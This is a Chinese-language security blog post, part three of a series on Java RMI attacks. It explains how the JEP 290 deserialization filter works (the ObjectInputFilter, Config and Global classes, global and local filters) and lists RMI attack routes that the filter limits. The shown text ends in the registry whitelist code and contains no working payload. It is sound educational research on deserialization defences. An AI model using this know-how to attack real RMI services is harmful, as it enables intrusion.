<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="RMI攻击（三）, Ethe&#39;s blog">
    <meta name="description" content="最后一篇了吧（大概
前两篇介绍了RMI的流程和基础的攻击，这一篇写点进阶的东西
JEP290在JDK6u141、JDK7u131、JDK 8u121加入了JEP 290限制,JEP 290过滤策略有
进程级过滤器
可以将进程级序列化过滤器作">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>RMI攻击（三） | Ethe&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://epicture.oss-cn-beijing.aliyuncs.com/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://epicture.oss-cn-beijing.aliyuncs.com/css/my.css">

    <script src="https://epicture.oss-cn-beijing.aliyuncs.com/libs/jquery/jquery-3.6.0.min.js"></script>
    <script src="https://sdk.jinrishici.com/v2/browser/jinrishici.js" charset="utf-8"></script>

<meta name="generator" content="Hexo 5.4.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://cdn.jsdelivr.net/gh/Tokisaki-Galaxy/res/site/medias/background.jpg);
       background-repeat:no-repeat;
       background-size: cover;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Ethe&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://epicture.oss-cn-beijing.aliyuncs.com/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Ethe&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://epicture.oss-cn-beijing.aliyuncs.com/medias/featureimages/1.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">RMI攻击（三）</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: scroll;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }
    #toc-content .is-active-link::before {
        background-color: #42b983;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }
    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/web%E5%AD%A6%E4%B9%A0/">
                                <span class="chip bg-color">web学习</span>
                            </a>
                        
                            <a href="/tags/Java/">
                                <span class="chip bg-color">Java</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-05-20
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-05-22
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    6.5k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    27 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="https://epicture.oss-cn-beijing.aliyuncs.com/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>最后一篇了吧（大概</p>
<p>前两篇介绍了RMI的流程和基础的攻击，这一篇写点进阶的东西</p>
<h1 id="JEP290"><a href="#JEP290" class="headerlink" title="JEP290"></a>JEP290</h1><p>在<code>JDK6u141</code>、<code>JDK7u131</code>、<code>JDK 8u121</code>加入了JEP 290限制,JEP 290过滤策略有</p>
<p><strong>进程级过滤器</strong></p>
<p>可以将进程级序列化过滤器作为命令行参数（“-Djdk.serialFilter =”）传递，或将其设置为$JAVA_HOME/conf/security/java.security中的系统属性。</p>
<p><strong>自定义过滤器</strong></p>
<p>可以使用自定义过滤器来重写特定流的进程级过滤器</p>
<p><strong>内置过滤器</strong></p>
<p>JDK分别为RMI注册表和RMI分布式垃圾收集器提供了相应的内置过滤器。这两个过滤器都配置为白名单，即只允许反序列化特定类。</p>
<p>这里我把jdk版本换成jdk1.8.0_111,默认使用内置过滤器。然后直接使用上面的服务端攻击注册中心poc看下,执行完RMI Registry会提示这样的一个错误:</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520171314932.png" alt="image-20230520171314932"></p>
<p>这就是JEP290限制导致的</p>
<h1 id="JEP-290-核心类"><a href="#JEP-290-核心类" class="headerlink" title="JEP 290 核心类"></a>JEP 290 核心类</h1><p>JEP 290 涉及的核心类有： <code>ObjectInputStream</code> 类，<code>ObjectInputFilter</code> 接口，<code>Config</code> 静态类以及 <code>Global</code> 静态类。其中 <code>Config</code> 类是 <code>ObjectInputFilter</code>接口的内部类，<code>Global</code> 类又是<code>Config</code>类的内部类。</p>
<h2 id="ObjectInputStream-类"><a href="#ObjectInputStream-类" class="headerlink" title="ObjectInputStream 类"></a>ObjectInputStream 类</h2><p>JEP 290 进行过滤的具体实现方法是在 <code>ObjectInputStream</code> 类中增加了一个<code>serialFilter</code>属性和一个 <code>filterChcek</code> 函数，两者搭配来实现过滤的。</p>
<h3 id="构造函数"><a href="#构造函数" class="headerlink" title="构造函数"></a>构造函数</h3><p>有两个构造函数，我们需要关注的是在这两个构造函数中都会赋值 <code>serialFilter</code> 字段为 <code>ObjectInputFilter.Config.getSerialFilter()</code>:</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520214813392.png" alt="image-20230520214813392"></p>
<p>跟一下可以发现，<code>ObjectInputFilter.Config.getSerialFilter()</code>:返回的内容是ObjectInputFilter接口里的一个静态属性</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520214855340.png" alt="image-20230520214855340"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520214941035.png" alt="image-20230520214941035"></p>
<h3 id="serialFilter-属性"><a href="#serialFilter-属性" class="headerlink" title="serialFilter 属性"></a>serialFilter 属性</h3><p>这个属性是ObjectInputFilter类型的，这是一个接口</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520215200219.png" alt="image-20230520215200219"></p>
<p>这个接口又声明了一个 <code>checkInput</code> 方法</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520215304451.png" alt="image-20230520215304451"></p>
<h3 id="filterCheck-函数"><a href="#filterCheck-函数" class="headerlink" title="filterCheck 函数"></a>filterCheck 函数</h3><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520215423869.png" alt="image-20230520215423869"></p>
<p>看名字就知道这是个负责过滤的方法</p>
<p>它分了三步</p>
<p>第一步，先会判断 <code>serialFilter</code> 属性值是否为空，只有不为空，才会进行后续的过滤操作。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520215539088.png" alt="image-20230520215539088"></p>
<p>第二步，将我们需要检查的 <code>class</code> ，以及 <code>arryLength</code>等信息封装成一个<code>FilterValues</code>对象，传入到 <code>serialFilter.checkInput</code> 方法中，返回值为 <code>ObjectInputFilter.Status</code> 类型。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520215620742.png" alt="image-20230520215620742"></p>
<p>最后一步，判断 <code>status</code> 的值，如果 <code>status</code> 是 <code>null</code> 或者是 <code>REJECTED</code> 就会抛出异常。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520215633250.png" alt="image-20230520215633250"></p>
<h3 id="ObjectInputStream-总结"><a href="#ObjectInputStream-总结" class="headerlink" title="ObjectInputStream 总结"></a>ObjectInputStream 总结</h3><p>到这里可以知道，<code>serialFilter</code> 属性就可以认为是 JEP 290 中的&quot;过滤器&quot;。过滤的具体逻辑写到 <code>serialFilter</code> 的<code>checkInput</code> 方法中，配置过滤器其实就是设置 <code>ObjectInputStream</code> 对象的 <code>serialFilter</code>属性。并且在 <code>ObjectInputStream</code> 构造函数中会赋值 <code>serialFilter</code> 为 <code>ObjectInputFilter#Config</code> 静态类的 <code>serialFilter</code> 静态字段。</p>
<h2 id="ObjectInputFilter-接口"><a href="#ObjectInputFilter-接口" class="headerlink" title="ObjectInputFilter 接口"></a>ObjectInputFilter 接口</h2><p>是 <code>JEP 290</code> 中实现过滤的一个最基础的接口，想理解 JEP 290 ，必须要了解这个接口。</p>
<p>在低于 <code>JDK 9</code> 的时候的全限定名是 <code>sun.misc.ObjectInputFIlter</code>，<code>JDK 9</code> 及以上是 <code>java.io.ObjectInputFilter</code> 。</p>
<p>另外低于 <code>JDK 9</code> 的时候，是 <code>getInternalObjectInputFilter</code> 和 <code>setInternalObjectInputFilter</code>，<code>JDK 9</code> 以及以上是 <code>getObjectInputFilter</code> 和 <code>setObjectInputFIlter</code> 。</p>
<p>这是它的结构</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520224310006.png" alt="image-20230520224310006"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520224205442.png" alt="image-20230520224205442"></p>
<p>有一个 <code>checkInput</code> 函数，一个静态类 <code>Config</code> ，一个 <code>FilterInfo</code> 接口，一个 <code>Status</code> 枚举类。</p>
<h3 id="函数式接口"><a href="#函数式接口" class="headerlink" title="函数式接口"></a>函数式接口</h3><p><code>@FunctionalInterface</code> 注解表明， <code>ObjectInputFilter</code> 是一个函数式接口。对于不了解函数式接口的同学，可以参考：<a target="_blank" rel="noopener" href="https://www.runoob.com/java/java8-functional-interfaces.html">https://www.runoob.com/java/java8-functional-interfaces.html</a> 以及 <a target="_blank" rel="noopener" href="https://www.jianshu.com/p/40f833bf2c48">https://www.jianshu.com/p/40f833bf2c48</a> ， <a target="_blank" rel="noopener" href="https://juejin.cn/post/6844903892166148110">https://juejin.cn/post/6844903892166148110</a> 。</p>
<p>（我一直觉得这个lambda表达式怪逆天的，为了省两三行代码，把可读性搞得这么差</p>
<p>这里我们其实只需要关心函数式接口怎么赋值，函数式接口的赋值可以是： lambda 表达式或者是方法引用，当然也可以赋值一个实现了这个接口的对象</p>
<h2 id="Config-静态类"><a href="#Config-静态类" class="headerlink" title="Config 静态类"></a>Config 静态类</h2><p><code>Config</code> 静态类是 <code>ObjcectInputFilter</code> 接口的一个内部静态类。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/1630391557000-image-20210818120140858.png-w331s" alt="image-20210818120140858"></p>
<h3 id="Config-configuredFilter-静态字段"><a href="#Config-configuredFilter-静态字段" class="headerlink" title="Config#configuredFilter 静态字段"></a>Config#configuredFilter 静态字段</h3><p><code>configuredFilter</code> 的赋值操作是在Config类的静态代码块里，所以调用 <code>Config</code> 类的时候就会触发 <code>configuredFilter</code> 字段的赋值。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520230235320.png" alt="image-20230520230235320"></p>
<p>可以看到会拿到 <code>SERIAL_FILTER_PROPNAME（也就是jdk.serailFilter)</code> 属性值，如果不为空，会返回 <code>createFilter(props)</code>的结果（<code>createFilter</code> 实际返回的是一个 <code>Global</code> 对象）。</p>
<p><code>jdk.serailFilter</code> 属性值获取的方法用两种，第一种是获取 JVM 的 <code>jdk.serialFilter</code> 属性，第二种通过在 <code>%JAVA_HOME%\conf\security\java.security</code> 文件中指定 <code>jdk.serialFilter</code> 来设置。</p>
<h3 id="Config-createFilter-方法"><a href="#Config-createFilter-方法" class="headerlink" title="Config#createFilter 方法"></a>Config#createFilter 方法</h3><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520230558359.png" alt="image-20230520230558359"></p>
<p><code>Config#createFilter</code> 则会进一步调用 <code>Global.createFilter</code>方法，这个方法在介绍 <code>Global</code> 类的时候会说，其实就是将传入的 JEP 290 规则字符串解析到<code>Global</code>对象的 <code>filters</code> 字段上，并且返回这个 <code>Global</code> 对象。</p>
<h3 id="Config-静态类总结"><a href="#Config-静态类总结" class="headerlink" title="Config 静态类总结"></a>Config 静态类总结</h3><p><code>Config</code>会将<code>Config.serialFilter</code> 赋值为一个<code>Global</code>对象，这个<code>Global</code> 对象的<code>filters</code>字段值是<code>jdk.serailFilter</code>属性对应的 <code>Function</code> 列表。（关于 <code>Global</code> 对象介绍下面会说到，大家先有这么一个概念）</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520230905590.png" alt="image-20230520230905590"></p>
<p>而 <code>ObjectInputStream</code> 的构造函数中，正好取的就是 <code>Config.serialFilter</code> 这个静态字段 ， <strong>所以设置了 Config.serialFilter 这个静态字段，就相当于设置了 ObjectInputStream 类全局过滤器</strong>。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520214813392.png" alt="image-20230520214813392"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520214855340.png" alt="image-20230520214855340"></p>
<p>还可以通过配置 JVM 的 <code>jdk.serialFilter</code> 或者 <code>%JAVA_HOME%\conf\security\java.security</code> 文件的 <code>jdk.serialFilter</code> 字段值，来设置 <code>Config.serialFilter</code> ，也就是设置了全局过滤。</p>
<p>另外还有就是一些框架，在开始的时候设置也会设置 <code>Config.serialFilter</code> ，来设置 <code>ObjectInputStream</code> 类的全局过滤。 weblogic 就是，在启动的时候会设置 <code>Config.serialFilter</code> 为 <code>WebLogicObjectInputFilterWrapper</code> 对象。</p>
<h2 id="Global-静态类"><a href="#Global-静态类" class="headerlink" title="Global 静态类"></a>Global 静态类</h2><p><code>Global</code> 静态类是 Config 类中的一个内部静态类。</p>
<p><code>Global</code> 类的一个重要特征是实现了 ``ObjectInputFilter<code>接口，实现了其中的</code>checkInput<code>方法。所以</code>Global<code>类可以直接赋值到</code>ObjectInputStream.serialFilter` 上。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520231211756.png" alt="image-20230520231211756"></p>
<h3 id="Global-filters-字段"><a href="#Global-filters-字段" class="headerlink" title="Global#filters 字段"></a>Global#filters 字段</h3><p>是一个函数列表。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520231253842.png" alt="image-20230520231253842"></p>
<h3 id="Global-checkInput-方法"><a href="#Global-checkInput-方法" class="headerlink" title="Global#checkInput 方法"></a>Global#checkInput 方法</h3><p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520231327575.png" alt="image-20230520231327575"></p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520231353991.png" alt="image-20230520231353991"></p>
<p><code>Global</code> 类的 <code>checkInput</code> 会遍历 <code>filters</code> 去检测要反序列化的类。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520231407212.png" alt="image-20230520231407212"></p>
<h3 id="Global-中的构造函数"><a href="#Global-中的构造函数" class="headerlink" title="Global 中的构造函数"></a>Global 中的构造函数</h3><p>构造方法解析相关配置的JEP290规则语法，以<code>;</code>分割将其作为一个个规则，然后添加到 <code>Global.filters</code> 。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20211206184805162.png" alt="image-20211206184805162"></p>
<h3 id="Global-createFilter-方法"><a href="#Global-createFilter-方法" class="headerlink" title="Global#createFilter 方法"></a>Global#createFilter 方法</h3><p>传入规则字符串，来实例化一个 <code>Global</code> 对象。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520231703032.png" alt="image-20230520231703032"></p>
<h3 id="Global-类的总结"><a href="#Global-类的总结" class="headerlink" title="Global 类的总结"></a>Global 类的总结</h3><p><code>Global</code> 实现了<code>ObjectInputFilter</code>接口，所以是可以直接赋值到 <code>ObjectInputStream.serialFilter</code> 上。</p>
<p><code>Global#filters</code> 字段是一个函数列表。</p>
<p><code>Global</code> 类中的 <code>chekInput</code> 方法会遍历 <code>Global#filters</code> 的函数，传入需要检查的 <code>FilterValues</code>进行检查（<code>FilterValues</code> 中包含了要检查的 <code>class</code>, <code>arrayLength</code>，以及 <code>depth</code> 等）。</p>
<h1 id="过滤器"><a href="#过滤器" class="headerlink" title="过滤器"></a>过滤器</h1><p>在上面总结 <code>ObjectInputStream</code> 类的中说过，配置过滤器其实就是设置 <code>ObjectInputStream</code> 类中的 <code>serialFilter</code> 属性。</p>
<p>过滤器的类型有两种，第一种是通过配置文件或者 <code>JVM</code> 属性来配置的全局过滤器，第二种则是来通过改变 <code>ObjectInputStream</code> 的 <code>serialFilter</code> 属性来配置的局部过滤器。</p>
<h2 id="全局过滤器"><a href="#全局过滤器" class="headerlink" title="全局过滤器"></a>全局过滤器</h2><p>设置全局过滤器，其实就是设置<code>Config</code>静态类的 <code>serialFilter</code> 静态字段值。</p>
<p>具体原因是因为在 <code>ObjectInputStream</code> 的两个构造函数中，都会为 <code>serialFilter</code> 属性赋值为 <code>ObjectInputFilter.Config.getSerialFilter()</code> 。</p>
<p>而 <code>ObjectInputFilter.Config.getSerialFilter</code> 就是直接返回 <code>Config#serialFilter</code>：</p>
<h3 id="jdk-serailFilter"><a href="#jdk-serailFilter" class="headerlink" title="jdk.serailFilter"></a>jdk.serailFilter</h3><p>在介绍 <code>Config</code> 静态类的时候说到，<code>Config</code> 静态类初始化的时候，会解析 <code>jdk.serailFilter</code> 属性设置的 JEP 290 规则到一个 <code>Global</code> 对象的 <code>filters</code> 属性，并且会将这个 <code>Global</code> 对象赋值到 <code>Config</code> 静态类的 <code>serialFilter</code> 属性上。</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520232123483.png" alt="image-20230520232123483"></p>
<p>所以，这里 <code>Config.serialFilter</code> 值默认是解析 <code>jdk.serailFilter</code> 属性得到得到的 <code>Global</code> 对象。</p>
<h2 id="局部过滤器"><a href="#局部过滤器" class="headerlink" title="局部过滤器"></a>局部过滤器</h2><p>设置局部过滤器的意思是在 <code>new</code> <code>objectInputStream</code> 对象之后，再通过改变单个 <code>ObjectInputStream</code> 对象的 <code>serialFilter</code>字段值来实现局部过滤。</p>
<p>改变单个 <code>ObjectInputStream</code> 对象的 <code>serialFilter</code> 字段是有两种方法：</p>
<p>1.通过调用 <code>ObjectInputStream</code> 对象的 <code>setInternalObjectInputFilter</code> 方法：</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520232257747.png" alt="image-20230520232257747"></p>
<p>2.通过调用 <code>Config.setObjectInputFilter</code> ：</p>
<p><img src="https://epicture.oss-cn-beijing.aliyuncs.com/img/DASCTFxCBCTF/image-20230520232514705.png" alt="image-20230520232514705"></p>
<p>这个其实就是通过<code>setObjectInputFilter</code>调到<code>setInternalObjectInputFilter</code> 方法</p>
<p>局部过滤器典型的例子是 RMI 中针对 <code>RegsitryImpl</code> 和 <code>DGCImpl</code>有关的过滤。</p>
<h1 id="JEP-290对RMI的限制"><a href="#JEP-290对RMI的限制" class="headerlink" title="JEP 290对RMI的限制"></a>JEP 290对RMI的限制</h1><p>在没有JEP 290之前，我们RMI攻击的路线有</p>
<p>客户端攻击注册中心<br>服务端攻击注册中心<br>注册中心攻击客户端<br>服务端攻击客户端<br>客户端攻击服务端<br>DGC客户端攻击DGC服务端<br>DGC服务端攻击DGC客户端<br>JRMP服务端攻击JRMP客户端</p>
<p>接下来我们看一下JEP 290限制了什么</p>
<p>这里就不跟代码了，直接贴结果</p>
<p>1、RegistryImpl_Skel强制RegistryImpl.checkAccess验证<br>限制服务端和注册中心必须在同一host，相当于强制将服务端和注册中心绑定在一起，也就没有这两者之间的远程互相攻击了。<br>2、配置了registry过滤器<br>RegistryImpl_Skel里面的对象反序列化时会进行白名单校验，内容如下：</p>
<pre class="language-java" data-language="java"><code class="language-java">if (String.class &#x3D;&#x3D; clazz
                 || java.lang.Number.class.isAssignableFrom(clazz)
                 || Remote.class.isAssignableFrom(clazz)
                 || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)
                 || UnicastRef.class.isAssignableFrom(clazz)
                 || RMIClientSocketFactory.class.isAssignableFrom(clazz)
                 || RMIServerSocketFactory.class.isAssignableFrom(clazz)
                 || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)
                 || java.rmi.server.UID.class.isAssignableFrom(clazz)) &#123;
             return ObjectInputFilter.Status.ALLOWED;
